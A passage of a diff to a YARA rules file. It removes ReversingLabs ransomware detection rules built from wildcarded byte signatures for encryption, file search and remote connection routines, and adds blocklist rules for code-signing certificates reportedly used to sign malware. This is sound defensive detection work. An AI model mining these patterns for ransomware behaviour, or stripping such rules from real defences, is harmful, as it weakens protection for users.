-            ?? 4C 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 E4 48 89 44 24 ?? 48 8D 95 ?? ??
-            ?? ?? 45 33 C9 44 89 64 24 ?? 44 8B C3 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 4C 24 ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ?? ?? ??
-            ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 8D 44 24 ??
-            48 89 44 24 ?? 45 33 C9 48 8D 44 24 ?? 89 9D ?? ?? ?? ?? 33 D2 48 89 44 24 ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 41 8B DC 44 39 A5 ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 4C 04 ?? E8 ?? ?? ?? ?? 48 8D 95 ??
-            ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ?? ?? ?? 72 ?? 48 8B 8D ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ?? B9
-        }
-		$encrypt_files_p2 = {
-            48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 55 41 54 41 55 41 56 41 57 48 8D A8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89
-            85 ?? ?? ?? ?? 45 33 E4 C7 44 24 ?? ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 89 25 ?? ?? ??
-            ?? 48 8D 95 ?? ?? ?? ?? 44 89 25 ?? ?? ?? ?? 33 C9 44 89 25 ?? ?? ?? ?? 45 8B FC 4C
-            89 25 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8
-            48 8D 85 ?? ?? ?? ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 66 44 89 20 4C 8D 05
-            ?? ?? ?? ?? 48 83 C0 ?? 4C 89 64 24 ?? 48 89 05 ?? ?? ?? ?? 45 33 C9 48 8D 05 ?? ??
-            ?? ?? 44 89 64 24 ?? 33 D2 48 89 05 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9
-            44 8D 42 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3
-            ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44
-            8B F0 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46
-        }
-		$find_files = {
-            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9
-            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24
-            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ??
-            ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
-            ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3
-            5D C3
-        }
-		$remote_connection = {
-            44 0F B7 45 ?? 33 DB 48 8B 55 ?? 45 33 C9 48 89 5C 24 ?? 48 8B CE 89 5C 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ??
-            ?? 80 7D ?? ?? B9 ?? ?? ?? ?? 4C 8B 45 ?? B8 ?? ?? ?? ?? 48 8B 55 ?? 0F 44 C8 48 89
-            5C 24 ?? 45 33 C9 89 4C 24 ?? 89 4D ?? 49 8B CE 48 89 5C 24 ?? 48 89 5C 24 ?? FF 15
-            ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 4C 8D 4D ?? 4C 8D 45 ??
-            C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 4D ??
-            ?? ?? ?? ?? 4C 8D 45 ?? 41 B9 ?? ?? ?? ?? 48 8B CB 41 8D 51 ?? FF 15 ?? ?? ?? ?? 4C
-            8B 4D ?? 48 8B C7 48 F7 D8 48 8B D7 8B 45 ?? 48 8B CB 45 1B C0 89 44 24 ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? 33 FF 83 65 ?? ?? 48 8D 55 ?? 45 33 C9 45 33 C0 48 8B CB FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 49 8B CF 03 D7 E8 ?? ?? ?? ?? 44 8B 45 ?? 4C 8D 4D
-            ?? 8B D7 48 8B CB 48 03 D0 4C 8B F8 FF 15 ?? ?? ?? ?? 8B 45 ?? 03 F8 EB ?? 8B 45
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PHL E STATE ApS" and ( pe.signatures [ i ] . serial == "00:b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" or pe.signatures [ i ] . serial == "b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" ) and 1620000000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wildfire : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WildFire ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0c44f017-703c-5db7-b777-62fcd181af9a"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "1cf2bda8-05e6-5f0a-a28a-2f5fa02775c9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.WildFire.yara#L1-L77"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d3be2eac7967853aae6e1317d9c22d95a3dc4b3e5bf8acbe97a7bbeabc9eab38"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12012-L12028"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6fbed9c8537ea2baeb58044a934fc9741730b8a3ae4d059c23b033973d7ff7d3"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WildFire"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            00 02 19 17 73 ?? ?? ?? ?? 0A 1B 8D ?? ?? ?? ?? 25 16 02 16 02 [5-10] 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? A2 25 17 [5-10] A2 25 18 7E ?? ?? ?? ?? A2 25 19 [5-10] A2 25 1A 02 02
-            [5-10] 6F ?? ?? ?? ?? 17 D6 6F ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0B 07 [5-10] 28 ?? ?? ??
-            ?? 1A 18 73 ?? ?? ?? ?? 0C 08 21 00 00 00 00 00 00 00 00 6F ?? ?? ?? ?? 20 ?? ?? ?? ??
-            8D ?? ?? ?? ?? 0D 21 00 00 00 00 00 00 00 00 13 ?? 06 6F ?? ?? ?? ?? 13 ?? 73 ?? ?? ??
-            ?? 13 ?? 08 11 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
-            2B ?? 06 09 16 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 09 16 11 ?? 6F ?? ?? ?? ?? 11
-            ?? 11 ?? 6A D6 13 ?? 11 ?? 11 ?? FE ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 08
-            6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? DE ?? 2A
-        }
-		$enum_drives = {
-            00 00 28 ?? ?? ?? ?? 1F ?? 0A 18 0C 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 0C 28 ?? ?? ?? ?? 0D 1A
-            0C 09 13 ?? 16 13 ?? 11 ?? 11 ?? 8E 69 FE ?? 2C ?? 11 ?? 11 ?? 9A 13 ?? 1B 0C 11 ??
-            6F ?? ?? ?? ?? 2C ?? 1C 0C 11 ?? 6F ?? ?? ?? ?? 19 FE ?? 16 FE ?? 65 18 60 1A 60 11
-            ?? 6F ?? ?? ?? ?? 21 ?? ?? ?? ?? ?? ?? ?? ?? FE ?? 16 FE ?? 65 5F 16 FE ?? 2C ?? 1D
-            0C 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1E 0C 11 ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B
-        }
-		$file_search = {
-            A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10]
-            A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 0D 19 0C 19 8D ?? ?? ?? ??
-            25 16 [5-10] A2 25 17 [5-10] A2 25 18 [5-10] A2 13 04 1A 0C 02 28 ?? ?? ?? ?? 13 ?? 1B
-            0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? (30 | 3D) [1-4] 1C 0C 11 ?? 11 ?? 9A 28
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1D 0C 09 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 9A [5-10] 6F
-            ?? ?? ?? ?? 16 FE ?? 5F 11 ?? 11 ?? 9A 1F ?? 28 ?? ?? ?? ?? [5-10] 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 16 FE ?? 5F 11 ?? [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 5F 2C ?? 1E 0C 11 ?? 11 ??
-            9A 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? (38 | 2B) [1-4] 1F ?? 0C 02 28 ?? ?? ?? ??
-            13 ?? 1F ?? 0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? 30 ?? 1F ?? 0C 11 ?? 11 ??
-            11 ?? 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE ?? 2C ?? 1F ?? 0C 11 ?? 11 ?? 9A 28 ?? ??
-            ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B ?? 1F ?? 0C 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F
-            ?? ?? ?? ?? 8E 69 17 DA 18 FE ?? 16 FE ?? 2C ?? 1F ?? 0C 02 16 28 ?? ?? ?? ?? DD ?? ??
-            ?? ?? 07 17 58 16 0B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? DE
-        }
-		$remote_server_communication_1 = {
-            00 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 9A [5-10] 28 ??
-            ?? ?? ?? 0B 02 [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 02 [5-10] 16 28 ?? ?? ??
-            ?? 16 FE ?? 39 ?? ?? ?? ?? 1D 8D ?? ?? ?? ?? 25 16 [5-10] A2 25 17 02 A2 25 18 [5-10] A2
-            25 19 7E ?? ?? ?? ?? A2 25 1A [5-10] A2 25 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1C [5-10]
-            A2 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ??
-            [5-10] 11 ?? 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07
-            28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? [5-10] 6F ?? ?? ?? ?? 11 ?? [5-10] 6F ?? ?? ?? ??
-            11 ?? 11 ?? 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ??
-            ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
-            74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures [ i ] . serial == "54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" and 1607100127 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "488be2f7-e3d4-51e3-b7bb-142caa7b2bd5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12030-L12046"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f169925c27f5e0f8d5f658b83d1b9fa4548c4443b16bd4d7f87aa2b8e44bf06b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $enum_drives and $file_search and $encrypt_files and $remote_server_communication_1
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A.B. gostinstvo trgovina posredni\\xC5\\xA1tvo in druge storitve, d.o.o." and pe.signatures [ i ] . serial == "14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" and 1614124800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sarbloh : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sarbloh ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "532abd77-f091-5c54-87a3-7e8be5253efd"
-		date = "2021-05-21"
-		modified = "2021-05-21"
+		id = "4d24a880-6fa5-5c22-875e-29f4985e3750"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Sarbloh.yara#L1-L88"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7259aa9d1fe657db220ee50f1610e6439ff61673d92f46ebc3b8cadd990f002c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12048-L12064"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ab2c228088a4c11b3a0f1a5f0acf181cc31e548781cb3f1205475bfbe39c7236"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sarbloh"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 75 ?? 72 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ??
-            ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 75
-            ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? C1 E6 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8D 85 ?? ?? ?? ??
-            6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? 8B C1 8B 55 ?? 0B C2 89 4D ?? 89 55 ?? 0F 84 ?? ?? ?? ?? 0F 57 C0 66
-            0F 13 45 ?? 85 D2 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ??
-            8B 45 ?? 89 45 ?? EB ?? 8B 75 ?? 8B 7D ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
-            50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 89 4D ?? 89 45 ??
-            85 C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 6A ?? 6A ?? 56 8B 75 ??
-            8D 45 ?? 56 50 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 75 ?? EB ?? 33 F6 8B 45 ?? 8B 4D ?? 89 75 ?? 89 4D ?? 89 45 ?? 85
-            C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ??
-            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 FF 85 C0 0F 88 ?? ?? ?? ?? 85 F6 0F 84
-        }
-		$encrypt_files_p2 = {
-            8B 75 ?? 8D 45 ?? 56 50 53 52 6A ?? 52 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 53 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 4D ??
-            81 C7 ?? ?? ?? ?? 3B 7D ?? 72 ?? 8B 75 ?? 03 75 ?? 8B 45 ?? 83 D0 ?? 89 75 ?? 89 45
-            ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B B5 ?? ?? ?? ?? 8B 75 ?? 0F 82 ?? ?? ?? ?? 8D
-            45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 6A ?? 1B DB 8D 45
-            ?? 23 5D ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ??
-            F7 D8 1B F6 23 75 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8
-            85 FF 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 57 8D 45 ?? 50 6A ?? 6A
-            ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 39 75 ?? 75 ??
-            8B 85 ?? ?? ?? ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 6A ?? 89 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 8D 45 ?? 89 9D ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 89 B5 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 33 C0 B9 ?? ?? ?? ?? 83
-            7D ?? ?? 0F 44 C1 89 45 ?? 89 7D ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 03 4D ?? 39 4D ?? 73
-            ?? 90 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 57 6A ?? FF 15 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 8B 75 ?? EB
-        }
-		$find_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 8B 75 ?? 57 8B F9 83 3E ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D
-            45 ?? 50 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 89 45 ?? 8D
-            45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0F 89 4D ?? 85 C0 78 ??
-            83 F9 ?? 74 ?? FF 75 ?? BB ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 8B 55 ?? EB ?? FF 75 ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8B 17 33 DB 89 55 ?? C7 45
-            ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 39 4D ?? 73
-        }
-		$find_files_p2 = {
-            8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 53 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B F8 33 DB
-            89 5D ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 85 FF 78 ?? 8B 4D ?? 8B 35 ??
-            ?? ?? ?? 2B CB 0F 84 ?? ?? ?? ?? 83 E9 ?? 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1
-            C1 E8 ?? F7 D0 A8 ?? 74 ?? F7 C1 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 74 ?? 83 FE
-            ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 C0
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTH PROPERTY LTD" and pe.signatures [ i ] . serial == "23:96:64:c1:2b:ae:b5:a6:d7:87:91:28:88:05:13:92" and 1618272000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d03619c7-c4e8-57bd-a19e-1452ab7a76df"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12066-L12082"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4aabe3beab0055b6ef8f6114c5236940f5693b44e94efd14132b450bb9232c03"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REI LUX UK LIMITED" and pe.signatures [ i ] . serial == "02:18:eb:fd:5a:9b:fd:55:d2:f6:61:f0:d1:8d:1d:71" and 1608508800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Major : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Major ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0c85aff8-1fb5-5e47-ae49-72445a000eaa"
-		date = "2021-01-26"
-		modified = "2021-01-26"
